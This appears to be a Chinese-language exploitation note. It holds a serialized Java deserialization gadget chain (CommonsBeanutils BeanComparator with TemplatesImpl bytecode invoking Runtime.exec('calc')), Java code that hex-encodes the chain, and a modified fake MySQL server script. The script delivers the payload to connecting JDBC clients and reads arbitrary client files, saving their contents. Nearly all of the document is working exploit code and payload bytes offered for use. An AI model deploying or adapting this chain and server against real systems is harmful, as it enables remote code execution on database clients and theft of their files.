ONk0iLBatZBgwJAzEBMKkD1SEDTTFbwhGvcB/ahGaW2UyyOOUjm1BesRoEHt2E7KrleXG6Q3o63dI4mIKw8MRB4Vy1KDi0BWlB3pDR2M4jODhgMKp5WbPAmBkIGY7BsXWu26p/7USNwZATNyIqQ5Lsi7VWyBG+gQdWqYqo4tzBsF0fNiRJPWDMmKsyA2quKDABma3mDS1DHbbG2xG0FyTYaRaXay5T/RnHMV25M9B7oCgG0IEAugRFZ8Gx4fayN7aVy1AQYGYHWQcDuuXoLGQ9blM9hMR5so5kJTVk9tUHt2jjg81jFsIfQVsFZC74YSiaZ2YVSE1W6lsGKrwX2D0UA+XhvomsYzErYggQsCfsUHFTurDH1TYd8PQRg7NkWsFA1cNawsjCeasAWYA2nHzg9DHXyIJ+Yiq2Dcb1Y/8E5dJyfO5DNp/Yxi0hCteuVd3mg/zt0Z0VMwUhR4HgNoza14UdpkFTY0XwEbjV1ntqAOhEr+D3g4jkpRvCUtsO8t/icNIsR2owzqCQmhSnnYaD1unQSpiW3eFdDdfHwVSubszXKCb1YSW2mqpQh5ZUHQgu1IgG8d0uRHmDCzMQNhiuM9S2ixQLaCoQ4YGLwapaivqynDICfGqxiQFvAu5WxQdve3AOCkw2bGmP4FpAnHYfzMgifmQahki88UAXKqH/ph92aC3UmcHiAS+0tMGmkVjjugKXbl4StIKZtIUulV91YuwpMSGNO4YWd92BNBX5ICcehVQGoIicf2Jr52MUY47vRuZYauheGXUz9YYBvXX+gd56ri0nuqqp/ypVVTcBIziM4UdIOI+TpqcFoN+pwe8Ohb734j1cvwcP/O15L/YoyoMbl2J8Oxpw+un8ytuRHn9S/33nVju1iQTyeoI8Fr38impCUlWuZMNwsHr9tSee+OXtv+n3aXh/2LTjtBktjhWAQb9uO71djceucZUcyMq+cOovhU//tFe/Pnxy2yKQ980jr7783dmVz2jeM1vwhpcriKsPhxd4oRE7MGYL2H3Gv7j0pw58H9ilDgvIOrsNWQsb6j4TFzb1h+//6I0K/w4ahG8VCXhlPBKVNUEKpHrwZnT9VZaY+udf7zW9iiTq1SOpAu9EWzN0XU9Gb38O/Ow/P9ggY/thDznSBVns4x4GFTN2vOQ1v1Jk4nOvf/Vw78tvf6lunbIQs/zCB14JMhLZGk1UTw3/5q579mOvqNzqDuYExXq4ip+k5QU0mBYX/ZFBt1FTy1KQ/kgzTjfl2y8knvmEHN+BslBu4qWXxp/6ddWFp4nZlfodc6UGM0US215SDxZuy/bm3ld2HavPCLo3Debe6nrxk8FZ2wklyjs2Kcm5rU7b5sKnA1dNtcaj1f7HH5xKwYhw6ZUf9ixc/N+UPhE6m9wtpWS4W1twVGOP3rN/6ptvzX/vy/d1FHRGuzIxhE6+oPx9IZU6eepcchJ+Tl6Ympo8m1LgiwZcCGG/cCd1DG5aTmnGl6vnJ6ABFAr5mVVqe2xiOzR4ndfvRRahhzA5c/bMmamzkxMUgTj+qbtZ1oFxiM1I4bMJ6EB8lkGjsaAR3A2AUf+E4VXgfMaFN9OUNVYMl8QxnAnswr6Hb7pjjGihmKl5/PnM1OLk86DfCJJyEj8W4nFLnL+nl3mNkqRTcC6bQxtb3V/c6ow2MF472rB855br4nLFrReG5qdNW4qeROzzgzyJZpsbni13V1UFZReWzaGo8gU3juE/fuvb/37h8+fjOY3k0yT8p09Hm/9AIbyr+V9CkiROKt6S+mTV/wPNntrnhRsAAA==

将cb字节数组转化为16进制数据,(给mysql组件反序列化),

package org.example;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;
import java.util.Base64;
import java.util.Comparator;
import java.util.PriorityQueue;

public class Main implements Serializable {
public static void main(String[] args) throws Exception {
byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};

//输出16进行字符串,为mysql反序列化自定义数据做准备,
StringBuilder sb = new StringBuilder();
for (byte b : bytes) {
sb.append(String.format("%02x", b));
}
System.out.println(sb.toString());
//aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000005e8cafebabe0000003300340a000800240a002500260800270a002500280700290a0005002a07002b07002c0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100124c6f72672f6578616d706c652f43616c633b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e7307002d0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000d537461636b4d61705461626c6507002901000a536f7572636546696c6501000943616c632e6a6176610c0009000a07002e0c002f003001000463616c630c003100320100136a6176612f696f2f494f457863657074696f6e0c0033000a0100106f72672f6578616d706c652f43616c63010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000400010009000a0001000b0000002f00010001000000052ab70001b100000002000c0000000600010000000b000d0000000c000100000005000e000f00000001001000110002000b0000003f0000000300000001b100000002000c00000006000100000016000d00000020000300000001000e000f00000000000100120013000100000001001400150002001600000004000100170001001000180002000b000000490000000400000001b100000002000c00000006000100000019000d0000002a000400000001000e000f000000000001001200130001000000010019001a000200000001001b001c0003001600000004000100170008001d000a0001000b000000610002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050003000c0000001600050000000e00090011000c000f000d001000110012000d0000000c0001000d0004001e001f000000200000000700024c0700210400010022000000020023707400126e616d653535303639313835333834373030707701007871007e000d78

}

}

利用此脚本来搭建mysql服务端,地址:https://github.com/fnmsd/MySQL_Fake_Server
server.py更改为以下脚本,将生成的16进制数据放到mysql服务端中,

import asyncio
import base64
import logging
import signal
import random

signal.signal(signal.SIGINT, signal.SIG_DFL)

from mysqlproto.protocol import start_mysql_server
from mysqlproto.protocol.base import OK, ERR, EOF
from mysqlproto.protocol.flags import Capability
from mysqlproto.protocol.handshake import HandshakeV10, HandshakeResponse41, AuthSwitchRequest
from mysqlproto.protocol.query import ColumnDefinition, ColumnDefinitionList, ResultSet, FileReadPacket
import subprocess
import time


@asyncio.coroutine
def accept_server(server_reader, server_writer):
task = asyncio.Task(handle_server(server_reader, server_writer))


@asyncio.coroutine
def process_fileread(server_reader, server_writer, filename):
print("Start Reading File:" + filename.decode('utf8'))
FileReadPacket(filename).write(server_writer)
yield from server_writer.drain()
# server_writer.reset()
# time.sleep(3)

isFinish = False
outContent = b''
outputFileName = "%s/%s___%d___%s" % (
fileOutputDir, server_writer.get_extra_info('peername')[:2][0], int(time.time()),
filename.decode('ascii').replace('/', '_').replace('\', '_').replace(':', '_'))
while not isFinish:
packet = server_reader.packet()
while True:
fileData = (yield from packet.read())
# 当前packet没有未读取完的数据
if fileData == '':
break
# 空包,文件读取结束
if fileData == b'':
isFinish = True
break
outContent += fileData
if len(outContent) == 0:
print("Nothing had been read")
else:
if displayFileContentOnScreen:
print("========File Conntent Preview=========")
try:
print(outContent.decode('utf8')[:1000])
except Exception as e:
# print(e)
print(outContent[:1000])
print("=======File Conntent Preview End==========")
if saveToFile:
with open(outputFileName, 'wb') as f:
f.write(outContent)
print("Save to File:" + outputFileName)
# OK(capability, handshake.status).write(server_writer)
# server_writer.close()
return


@asyncio.coroutine
def handle_server(server_reader, server_writer):
handshake = HandshakeV10()
handshake.write(server_writer)
print("Incoming Connection:" + str(server_writer.get_extra_info('peername')[:2]))
yield from server_writer.drain()
switch2clear = False
handshake_response = yield from HandshakeResponse41.read(server_reader.packet(), handshake.capability)
username = handshake_response.user
print("Login Username:" + username.decode("ascii"))
# print("<=", handshake_response.__dict__)
# 检测是否需要切换到mysql_clear_password
if username.endswith(b"_clear"):
switch2clear = True
username = username[:-len("_clear")]
capability = handshake_response.capability_effective

if (Capability.PLUGIN_AUTH in capability and
handshake.auth_plugin != handshake_response.auth_plugin
and switch2clear):
print("Switch Auth Plugin to mysql_clear_password")
AuthSwitchRequest().write(server_writer)
yield from server_writer.drain()
auth_response = yield from server_reader.packet().read()
print("<=", auth_response)

result = OK(capability, handshake.status)
result.write(server_writer)
yield from server_writer.drain()

while True:
server_writer.reset()
packet = server_reader.packet()
try:
cmd = (yield from packet.read(1))[0]
except Exception as _:
# TODO:可能会出问题 ┓( ´∀` )┏
return
pass
print("<=", cmd)
query = (yield from packet.read())
if query != '':
query = query.decode('ascii')
if username.startswith(b"fileread_"):
yield from process_fileread(server_reader, server_writer, username[len("fileread_"):])
result = OK(capability, handshake.status)
# return
elif username in fileread_dict:
# query =(yield from packet.read())
yield from process_fileread(server_reader, server_writer, fileread_dict[username])
result = OK(capability, handshake.status)
# return
elif username not in yso_dict and not username.startswith(b"yso_"):
# query =(yield from packet.read())
yield from process_fileread(server_reader, server_writer, random.choice(defaultFiles))
result = OK(capability, handshake.status)
print("使用yso了")
elif cmd == 1:
result = ERR(capability)
# return
elif cmd == 3:
# query = (yield from packet.read()).decode('ascii')
if 'SHOW VARIABLES'.lower() in query.lower():
print("Sending Fake MySQL Server Environment Data")
ColumnDefinitionList((ColumnDefinition('d'), ColumnDefinition('e'))).write(server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("max_allowed_packet", "67108864")).write(server_writer)
ResultSet(("system_time_zone", "UTC")).write(server_writer)
ResultSet(("time_zone", "SYSTEM")).write(server_writer)
ResultSet(("init_connect", "")).write(server_writer)
ResultSet(("auto_increment_increment", "1")).write(server_writer)
result = EOF(capability, handshake.status)
elif username in yso_dict:
# Serial Data
print("Sending Presetting YSO Data with username " + username.decode('ascii'))
ColumnDefinitionList((ColumnDefinition('a'), ColumnDefinition('b'), ColumnDefinition('c'))).write(
server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("11", yso_dict[username], "2333")).write(server_writer)
result = EOF(capability, handshake.status)
elif username.startswith(b"yso_"):
query = (yield from packet.read())
_, yso_type, yso_command = username.decode('ascii').split("_")
print("Sending YSO data with params:%s,%s" % (yso_type, yso_command))
content = get_yso_content(yso_type, yso_command)
ColumnDefinitionList((ColumnDefinition('a'), ColumnDefinition('b'), ColumnDefinition('c'))).write(
server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("11", content, "2333")).write(server_writer)
result = EOF(capability, handshake.status)
elif query.decode('ascii') == 'select 1':
ColumnDefinitionList((ColumnDefinition('database'),)).write(server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(('test',)).write(server_writer)
result = EOF(capability, handshake.status)
else:
result = OK(capability, handshake.status)

else:
result = ERR(capability)

result.write(server_writer)
yield from server_writer.drain()


yso_dict = {

}


def get_yso_content(yso_type, command):
# popen = subprocess.Popen([javaBinPath, '-jar', ysoserialPath, yso_type, command], stdout=subprocess.PIPE)
# file_content = popen.stdout.read()

b = "aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000005e8cafebabe0000003300340a000800240a002500260800270a002500280700290a0005002a07002b07002c0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100124c6f72672f6578616d706c652f43616c633b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e7307002d0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000d537461636b4d61705461626c6507002901000a536f7572636546696c6501000943616c632e6a6176610c0009000a07002e0c002f003001000463616c630c003100320100136a6176612f696f2f494f457863657074696f6e0c0033000a0100106f72672f6578616d706c652f43616c63010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000400010009000a0001000b0000002f00010001000000052ab70001b100000002000c0000000600010000000b000d0000000c000100000005000e000f00000001001000110002000b0000003f0000000300000001b100000002000c00000006000100000016000d00000020000300000001000e000f00000000000100120013000100000001001400150002001600000004000100170001001000180002000b000000490000000400000001b100000002000c00000006000100000019000d0000002a000400000001000e000f000000000001001200130001000000010019001a000200000001001b001c0003001600000004000100170008001d000a0001000b000000610002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050003000c0000001600050000000e00090011000c000f000d001000110012000d0000000c0001000d0004001e001f000000200000000700024c0700210400010022000000020023707400126e616d653535303639313835333834373030707701007871007e000d78"
file_content = b
print("使用了自定义的payload")
return file_content


